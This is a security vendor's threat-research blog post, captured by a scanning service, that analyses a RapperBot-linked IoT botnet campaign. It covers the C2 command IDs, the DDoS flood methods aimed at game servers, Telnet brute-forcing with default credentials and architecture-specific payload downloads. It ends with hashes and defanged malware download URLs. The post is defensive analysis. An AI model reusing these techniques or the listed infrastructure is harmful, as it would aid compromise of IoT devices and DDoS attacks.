www.fortinet.com
Open in
urlscan Pro
18.156.16.255
Public Scan
URL:
https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks
Submission: On November 16 via api from DE — Scanned from DE
Submission: On November 16 via api from DE — Scanned from DE
Form analysis
1 forms found in the DOMGET /blog/search
<form class="b3-searchbox__form" action="/blog/search" method="get">
<input class="b3-searchbox__input" type="text" name="q" placeholder="Search Blogs">
<button class="b3-searchbox__icon" aria-label="Search" type="submit">
<svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
<path
d="M15.688 14.18l-4.075-4.075C12.36 9.06 12.8 7.78 12.8 6.4 12.8 2.87 9.93 0 6.4 0 2.87 0 0 2.87 0 6.4c0 3.53 2.87 6.4 6.4 6.4 1.38 0 2.66-.44 3.705-1.187l4.075 4.075c.207.208.48.312.753.312.274 0 .547-.104.755-.312.416-.417.416-1.093 0-1.51zM2.133 6.4c0-2.357 1.91-4.267 4.267-4.267s4.267 1.91 4.267 4.267-1.91 4.267-4.267 4.267S2.133 8.757 2.133 6.4z"
fill="#fff">
</path>
</svg>
</button>
</form>
Text Content
Blog * Categories * Business & Technology * Threat Research * Industry Trends * Partners * Customer Stories * PSIRT Blogs * Business & Technology * Threat Research * Industry Trends * Partners * Customer Stories * PSIRT Blogs * CISO Collective * Subscribe Threat Research NEW RAPPERBOT CAMPAIGN – WE KNOW WHAT YOU BRUTING FOR THIS TIME By Joie Salvio and Roy Tay | November 15, 2022 After FortiGuard Labs reported on RapperBot in our previous article titled So RapperBot, What Ya Bruting For? in August 2022, there was a significant drop in the number of samples collected in the wild. But in early October 2022, new samples with the same distinctive C2 protocol used by RapperBot were detected. Unlike the murky objectives of the previous campaign, it is quickly evident that these samples are part of a separate campaign to launch Distributed Denial of Service (DDoS) attacks against game servers, which we believe to be a re-emergence of a similar campaign from earlier this year. Affected Platforms: Linux Impacted Users: Any organization Impact: Remote attackers gain control of the vulnerable systems Severity Level: Critical This article discusses the differences observed in this campaign and its relation to the previous RapperBot and similar campaigns in the past. RAPPERBOT REBOOTED FortiGuard Labs encountered this campaign by hunting for samples using the unique bot ID used by RapperBot to communicate with its Command-and-Control (C2) server, as reported in the previous article. But once we analyzed these new samples, we observed a significant difference between them and the earlier campaign. In fact, it turns out that this campaign is less like RapperBot than an older campaign that appeared in February and then mysteriously disappeared in the middle of April. Other related campaigns uncovered during this investigation are detailed later in this article. NETWORK PROTOCOL AND DENIAL-OF-SERVICE (DOS) ATTACKS The C2 network protocol used in previous campaigns remains essentially unchanged, with additional commands added to support the Telnet brute force. The list of commands and IDs are shown below: * 0x00: Register (used by the client) * 0x01: Keep-Alive/Do nothing * 0x02: Stop all DoS attacks and terminate the client * 0x03: Perform a DoS attack * 0x04: Stop all DoS attacks * 0x06: Restart Telnet brute forcing * 0x07: Stop Telnet brute forcing The previously reported RapperBot campaign was limited to a few generic DoS methods against TCP and UDP services. This campaign adds DoS attacks against the GRE protocol (likely reusing the Mirai source code) and the UDP protocol used by the Grand Theft Auto: San Andreas Multi Player (SA:MP) mod. Here are the DoS attack commands supported by this botnet: * 0x00: Generic UDP flood * 0x01: TCP SYN flood * 0x02: TCP ACK flood * 0x03: TCP STOMP flood * 0x04: UDP SA:MP flood targeting game servers running GTA San Andreas: Multi Player (SA:MP) * 0x05: GRE Ethernet flood * 0x06: GRE IP flood * 0x07: Generic TCP flood These specific commands, coupled with the absence of HTTP-related DDoS attacks, suggests that this campaign is primarily geared toward game server DDoS. TELNET SELF-PROPAGATION The most significant difference in the new campaign was the complete replacement of the SSH brute forcing code with the more usual Telnet equivalent. FortiGuard Labs has observed similar drastic modifications within RapperBot samples, as detailed in our previous report, adding and removing even DoS attack code on an apparent whim. The Telnet brute forcing code is designed primarily for self-propagation and resembles the old Mirai Satori botnet. Unlike the earlier SSH brute-forcing campaign, the plaintext credentials are embedded into the malware instead of being downloaded from the C2. Figure 1. Function initializing the credential list These credentials used appear to be default credentials for IoT devices. To optimize brute forcing efforts, the malware compares the server prompt upon connection to a hardcoded list of strings to identify the possible device and then only tries the known credentials for that device. Unlike less sophisticated IoT malware, this allows the malware to avoid trying to test a full list of credentials. While not exactly a novel technique, it is still uncommon compared to other IoT botnets. Based on the prompt messages hardcoded into the malware, most of the targeted devices are IoT devices such as routers and DVRs. This campaign seems especially interested in older devices with the Qualcomm MDM9625 chipset, such as LTE modems. It attempts to specifically gain root access to these devices via a default password, despite having the same credentials in the list embedded in the binary. Figure 2. Gaining root access on devices with a default password Like the earlier SSH brute-forcing campaign, once it has successfully gained access, it sends the credentials used, the compromised device’s IP address, and its architecture to the C2 server on a separate port, 5123. After reporting, the malware attempts to install its main payload binary on the compromised device. It first parses the Executable and Linkable Format (ELF) header of the /bin/busybox file for the e_machine field, which provides the architecture of the compromised device. This allows it to download and deploy a RapperBot payload of the correct architecture to ensure proper execution. This selective behavior is more efficient than the shotgun approach in most IoT malware families, whereby all the binaries for the supported architectures are downloaded and executed in the victim's system. Based on the payload binaries we collected, this botnet currently seems to only target devices running on ARM, MIPS, PowerPC, SH4, and SPARC architectures. Moreover, it specifically checks and stops its self-propagation if the device is detected to be running on Intel processors. The bot then downloads its payload via software installed on the compromised device, such as ftpget, wget, curl, or tftp, before executing the payload. Figure 3. Downloading the payload binary using the wget tool If none of the software mentioned above is installed, it will extract and send an embedded binary downloader to the compromised device that executes and downloads the primary payload. Unlike in Satori, these embedded downloaders are stored as escaped byte strings, probably to simplify parsing and processing within the code. Figure 4. List of embedded binary downloaders The binary downloaders are written by echoing the bytes and piping the content to a file in the victim system. As labeled in Figure 4, each binary has a hardcoded URL for downloading the payload binary of the proper architecture. Figure 5. Writing downloader binary and executing it No attempts to persist on infected or brute-forced devices were observed for this campaign. RELATED CAMPAIGNS FortiGuard Labs compared samples for this and related campaigns from the past to find any links with the previously reported RapperBot campaign. We observed that the earliest samples for this campaign were from December 2021 and that the SA:MP attack was only added in February 2022. This campaign mysteriously disappeared in mid-April 2022, resurfacing in Oct 2022 with the addition of the self-propagation feature. We also found older samples from another campaign that was active in August-September 2021 with an almost identical list of credentials. These samples contain slightly fewer credentials and a simpler self-propagation code that only supports downloading the payload via wget or the binary downloader embedded directly into the sample. This campaign did not support stopping or restarting the Telnet propagation, and while the samples support the same commands, their associated IDs did not match. Figure 6. Timeline of related campaigns The similar lists of credentials suggest that the threat actor behind this current campaign has access to the source code for the earlier campaign, as this code was not found in other IoT malware samples. CONNECTIONS TO RAPPERBOT The fact that samples from both campaigns use the same C2 protocol, coupled with the absence of this campaign during the RapperBot campaign active between June and Aug 2022 and its recent reappearance, seems to be more than a coincidence. With the several similarities between the two campaigns outlined below, we believe that either the same threat actor might be behind both campaigns or each campaign might have branched from the same privately-shared source code. 1. The C2 commands and corresponding IDs are identical in both campaigns (excluding the Telnet-related commands, as those do not apply to RapperBot) 2. Both campaigns show a certain degree of effort in optimizing the brute forcing implementation. Code for the brute forcing implementation is significantly more structured than typical IoT malware that copies and pastes code with minimal modifications. 3. RapperBot also supported the TCP STOMP attack popularized by Mirai. This attack was not observed in the earlier campaigns mentioned above. However, as both Mirai and Satori source code are publicly available, this is considered a very weak link between the campaigns. If both campaigns were related, the reason for restarting an older campaign remains a mystery. CONCLUSION Based on the undeniable similarities between this new campaign and the previously reported RapperBot campaign, it is highly likely that they are being operated by a single threat actor or by different threat actors with access to a privately-shared base source code. Unlike the previous RapperBot campaign, this new campaign has a clear motivation to compromise as many IoT devices as possible to build a DDoS botnet. Although this new campaign has evolved significantly from previous campaigns, mitigating it remains the same—setting strong passwords for all devices connected to the internet. FortiGuard Labs will continue to monitor RapperBot’s development. FORTINET PROTECTIONS The FortiGuard Antivirus service detects and blocks this threat as ELF/Mirai, Linux/Mirai, and ELF/Gafgyt. The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR, and the Fortinet AntiVirus engine is a part of each of those solutions. Customers running current AntiVirus updates are protected. FortiGuard Labs provides the Rapper.Botnet IPS signature against RapperBot C2 activity. The FortiGuard Web Filtering Service blocks the C2 servers and download URLs. FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources. IOCS FILES 3d5c5d9e792e0a5f3648438b7510b284f924ab433f08d558b6e082e1d5414a03 7afcac5f71e9205879e0e476d3388898a62e7aa4a3e4a059884f40ea36cfd57f 8ec79a35700f6691f0d88d53647e9f2b75648710ecd119e55815331fc3bdd0b5 a12ad4bc394d60bc037271e1c2df1bd2b87bdaaba85f6c1b7d046341f027cc2d f000bf482040b48595badee1fc56afb95449ac48b5dc35fe3a05542cbf18f658 4aa9175c1846557107ec197ea73d4cc8dbe6d575a8fd86ae214ff9b3a00e438b f98261eb7dc122449c158118cc9c660683206983a9e90ff73eb88c4705e0c48e DOWNLOAD URLS hxxp://185[.]216[.]71[.]149/armv4l hxxp://185[.]216[.]71[.]149/armv5l hxxp://185[.]216[.]71[.]149/armv6l hxxp://185[.]216[.]71[.]149/armv7l hxxp://185[.]216[.]71[.]149/mips hxxp://185[.]216[.]71[.]149/mipsel hxxp://185[.]216[.]71[.]149/powerpc hxxp://185[.]216[.]71[.]149/sparc hxxp://185[.]216[.]71[.]149/sh4 hxxp://185[.]216[.]71[.]149/bot_arm4_el hxxp://185[.]216[.]71[.]149/bot_arm5_el hxxp://185[.]216[.]71[.]149/bot_arm6_el hxxp://185[.]216[.]71[.]149/bot_arm7_el hxxp://185[.]216[.]71[.]149/bot_mips_eb hxxp://185[.]216[.]71[.]149/bot_mips_el hxxp://185[.]216[.]71[.]149/bot_sh_el C2 185[.]216[.]71[.]149 Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs. Tags: fortiguard labs, fortiguard antivirus, RapperBot, DDoS attacks RELATED POSTS Threat Research THREAT PREDICTIONS FOR 2023: NEW ATTACK SURFACES AND THREATS EMERGE AS CYBERCRIME EXPANDS Threat Research TIPS AND TRICKS: USING THE .NET OBFUSCATOR AGAINST ITSELF Threat Research MIRAI, RAR1RANSOM, AND GUARDMINER – MULTIPLE MALWARE CAMPAIGNS TARGET VMWARE VULNERABILITY * * * * * * NEWS & ARTICLES * News Releases * News Articles * Trademarks SECURITY RESEARCH * Threat Research * FortiGuard Labs * Threat Map * Threat Briefs * Ransomware CONNECT WITH US * Blog * Fuse Community COMPANY * About Us * Why Fortinet * Security Fabric * Exec Mgmt * Careers * Certifications * Events * Industry Awards * Sitemap * Blog Sitemap CONTACT US * (866) 868-3678 Copyright © 2022 Fortinet, Inc. All Rights Reserved Terms of Services Privacy Policy | Cookie Settings Also of Interest * DOJ & Top Security Threats * Pay Ransomware Settlements? * Why ZTNA in the Cloud Isn't Enough * Converging NOC & SOC starts with FortiGate COOKIE PREFERENCE CENTER * YOUR PRIVACY * STRICTLY NECESSARY COOKIES * PERFORMANCE COOKIES * FUNCTIONAL COOKIES * TARGETING COOKIES YOUR PRIVACY When you visit any website, it may store or retrieve information on your browser, mostly in the form of cookies. Because we respect your right to privacy, you can choose not to allow some types of cookies. Click on the different category headings to find out more and change our default settings. However, blocking certain cookies in the Functional category may impact your experience of the site and the services we are able to offer. privacy policy STRICTLY NECESSARY COOKIES Always Active These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. Cookies Details PERFORMANCE COOKIES Performance Cookies These cookies allow us to count visits and traffic sources so we can measure and improve the performance of our site. They help us to know which pages are the most and least popular and see how visitors move around the site. Cookies Details FUNCTIONAL COOKIES Functional Cookies These cookies enable the website to provide enhanced functionality and personalisation. They may be set by us or by third party providers whose services we have added to our pages. If you do not allow these cookies then some or all of these services may not function properly. Cookies Details TARGETING COOKIES Targeting Cookies These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites. They are based on uniquely identifying your browser and internet device. If you do not allow these cookies, you will experience less targeted advertising. Cookies Details BACK BUTTON BACK Vendor Search Filter Button Consent Leg.Interest checkbox label label checkbox label label checkbox label label * 33ACROSS 33ACROSS View Third Party Cookies * Name cookie name Clear checkbox label label Apply Cancel Confirm My Choices Allow All COOKIE SETTINGS By clicking “Accept All”, you agree to use of cookies on your device to enhance site functionality, analyze site usage, and assist in our marketing efforts. The Cookies Settings link has cookie-specific detail and preference options. privacy policy Reject All Accept All Cookies Settings